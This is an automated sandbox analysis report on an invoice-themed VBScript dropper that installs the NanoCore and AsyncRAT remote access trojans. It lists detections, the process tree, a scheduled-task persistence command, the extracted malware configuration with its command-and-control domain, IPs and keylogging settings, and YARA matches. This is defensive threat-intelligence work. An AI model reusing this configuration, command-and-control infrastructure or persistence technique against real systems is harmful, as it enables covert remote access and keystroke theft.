
Analysis Report Invoice No F1019855_PDF.vbs

Overview

General Information

Sample Name: Invoice No F1019855_PDF.vbs
Analysis ID: 404165
MD5: ce4dcec84bfeba49404fa70f5d137645
SHA1: c31021953c59af126d0095bea70c26ca02a2d954
SHA256: ca85b069b028fc30a2af436344eae332ad6afe8a7e3904a48ee63948ab6c3133
Tags: NanoCore, RAT, vbs

Detection

Detected families: Nanocore, AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected Nanocore RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • wscript.exe (PID: 6428 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ame.exe (PID: 6592 cmdline: 'C:\Users\user\AppData\Local\Temp\ame.exe' MD5: F7F64EC1756119F19D52FB140E22382F)
      • wscript.exe (PID: 6700 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
        • schtasks.exe (PID: 5544 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Notepads.exe (PID: 5444 cmdline: 'C:\Users\user\AppData\Roaming\Notepads.exe' MD5: F7F64EC1756119F19D52FB140E22382F)
    • fi.exe (PID: 6616 cmdline: 'C:\Users\user\AppData\Local\Temp\fi.exe' MD5: 86A588C5A10A04AF998DBAD9FF9A31D1)
  • dhcpmon.exe (PID: 6952 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 86A588C5A10A04AF998DBAD9FF9A31D1)
  • Notepads.exe (PID: 2152 cmdline: C:\Users\user\AppData\Roaming\Notepads.exe MD5: F7F64EC1756119F19D52FB140E22382F)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "ac555290-50d4-4120-9390-e76e4f94", "Group": "Start Up", "Domain1": "sys2021.linkpc.net", "Domain2": "", "Port": 11940, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4ibx53ALvuTHC2wskqA=="}

Yara Overview

Dropped Files

Source | Rule | Description | Author (matched strings are listed beneath each entry)
C:\Users\user\AppData\Local\Temp\fi.exe | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
C:\Users\user\AppData\Local\Temp\fi.exe | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
C:\Users\user\AppData\Local\Temp\fi.exe | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
C:\Users\user\AppData\Local\Temp\fi.exe | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfef5:$a: NanoCore
  • 0xff05:$a: NanoCore
  • 0x10139:$a: NanoCore
  • 0x1014d:$a: NanoCore
  • 0x1018d:$a: NanoCore
  • 0xff54:$b: ClientPlugin
  • 0x10156:$b: ClientPlugin
  • 0x10196:$b: ClientPlugin
  • 0x1007b:$c: ProjectData
  • 0x10a82:$d: DESCrypto
  • 0x1844e:$e: KeepAlive
  • 0x1643c:$g: LogClientMessage
  • 0x12637:$i: get_Connected
  • 0x10db8:$j: #=q
  • 0x10de8:$j: #=q
  • 0x10e04:$j: #=q
  • 0x10e34:$j: #=q
  • 0x10e50:$j: #=q
  • 0x10e6c:$j: #=q
  • 0x10e9c:$j: #=q
  • 0x10eb8:$j: #=q
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

Memory Dumps

Source | Rule | Description | Author (matched strings are listed beneath each entry)
00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1014d:$x1: NanoCore.ClientPluginHost
  • 0x1018a:$x2: IClientNetworkHost
  • 0x13cbd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfeb5:$a: NanoCore
  • 0xfec5:$a: NanoCore
  • 0x100f9:$a: NanoCore
  • 0x1010d:$a: NanoCore
  • 0x1014d:$a: NanoCore
  • 0xff14:$b: ClientPlugin
  • 0x10116:$b: ClientPlugin
  • 0x10156:$b: ClientPlugin
  • 0x1003b:$c: ProjectData
  • 0x10a42:$d: DESCrypto
  • 0x1840e:$e: KeepAlive
  • 0x163fc:$g: LogClientMessage
  • 0x125f7:$i: get_Connected
  • 0x10d78:$j: #=q
  • 0x10da8:$j: #=q
  • 0x10dc4:$j: #=q
  • 0x10df4:$j: #=q
  • 0x10e10:$j: #=q
  • 0x10e2c:$j: #=q
  • 0x10e5c:$j: #=q
  • 0x10e78:$j: #=q
00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1021d:$x1: NanoCore.ClientPluginHost
  • 0x1025a:$x2: IClientNetworkHost
  • 0x13d8d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security

Unpacked PEs

Source | Rule | Description | Author (matched strings are listed beneath each entry)
7.2.dhcpmon.exe.424e434.4.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xd9ad:$x1: NanoCore.ClientPluginHost
  • 0xd9da:$x2: IClientNetworkHost
7.2.dhcpmon.exe.424e434.4.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xd9ad:$x2: NanoCore.ClientPluginHost
  • 0xea88:$s4: PipeCreated
  • 0xd9c7:$s5: IClientLoggingHost
7.2.dhcpmon.exe.424e434.4.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
3.0.ame.exe.500000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
1.2.wscript.exe.16c170d0090.5.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xe38d:$x1: NanoCore.ClientPluginHost
  • 0xe3ca:$x2: IClientNetworkHost
  • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

Sigma Overview

AV Detection:

Sigma detected: NanoCore
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore (same run.dat file-creation event as listed under AV Detection)

System Summary:

Sigma detected: WScript or CScript Dropper
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community | Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\ame.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\ame.exe, ParentProcessId: 6592, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' , ProcessId: 6700

Stealing of Sensitive Information:

Sigma detected: NanoCore (same run.dat file-creation event as listed under AV Detection)

Remote Access Functionality:

Sigma detected: NanoCore (same run.dat file-creation event as listed under AV Detection)

            Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Notepads.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Source: C:\Users\user\AppData\Local\Temp\ame.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\fi.exe | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Found malware configuration
Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp | Malware Configuration Extractor: NanoCore (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Virustotal: Detection: 81%
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Metadefender: Detection: 90%
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\ame.exe | Virustotal: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\ame.exe | ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\fi.exe | Virustotal: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\fi.exe | Metadefender: Detection: 90%
Source: C:\Users\user\AppData\Local\Temp\fi.exe | ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Roaming\Notepads.exe | ReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: Invoice No F1019855_PDF.vbs | Virustotal: Detection: 29%
Source: Invoice No F1019855_PDF.vbs | ReversingLabs: Detection: 23%
Yara detected Nanocore RAT
Source: Yara match | File source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match | File source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Notepads.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ame.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\fi.exe | Joe Sandbox ML: detected
Source: 7.2.dhcpmon.exe.c40000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 7.0.dhcpmon.exe.c40000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.ame.exe.500000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 26.0.Notepads.exe.ee0000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 30.0.Notepads.exe.f40000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 4.2.fi.exe.4f70000.10.unpack | Avira: Label: TR/NanoCore.fadte
Source: 4.0.fi.exe.40000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.2.fi.exe.40000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: C:\Users\user\AppData\Local\Temp\fi.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: Binary string: mscorrc.pdb | source: fi.exe, 00000004.00000002.600584281.0000000004C80000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs:
Source: Malware configuration extractor | URLs: sys2021.linkpc.net
Connects to many ports of the same IP (likely port scanning)
Source: global traffic | TCP traffic: 79.137.109.121 ports 10090,0,1,4,9,11940
Potential malicious VBS script found (has network functionality)
Source: Initial file | zwLVbUFwZBZDbceUVAyKvSBZdGeuAMSuHWmohNPWzxPYjBKvHpkhxtBhvlsVpKwMjfvEpqnIkbKy.SaveToFile McuWOdLbqYeOPYiwaFEVWWSHoCSCcVdBKrzPZgVwoyASExZvjebwLKVpJnhMKIyUvcEXZTWtkIgY, JOszibYTglCXKYlUnHXtDSXmFsBPOvOQNEqqQpHaihrCgJSzpLUmlsiqrFtpZIElXmJGhvEx
Source: global traffic | TCP traffic: 192.168.2.6:49716 -> 79.137.109.121:11940
Source: global traffic | TCP traffic: 192.168.2.6:49725 -> 191.96.25.26:11940
Source: Joe Sandbox View | IP Address: 79.137.109.121 79.137.109.121
Source: unknown | TCP traffic detected without corresponding DNS query: 191.96.25.26 (this entry is repeated 27 times in the report)
Source: unknown | DNS traffic detected: queries for: sys2021.linkpc.net
Source: ame.exe, 00000003.00000002.537233135.0000000002BC0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT
Source: Yara match | File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
Source: Yara match | File source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match | File source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
Source: Yara match | File source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
Contains functionality to log keystrokes (.Net Source)
Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeLogger.cs | .Net Code: KeyboardLayout
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeLogger.cs | .Net Code: KeyboardLayout
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs | .Net Code: KeyboardLayout
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs | .Net Code: KeyboardLayout
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs | .Net Code: KeyboardLayout
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs | .Net Code: KeyboardLayout
Source: fi.exe, 00000004.00000002.594266413.0000000000808000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: fi.exe, 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp | Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT (same Yara matches as listed under AV Detection)

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
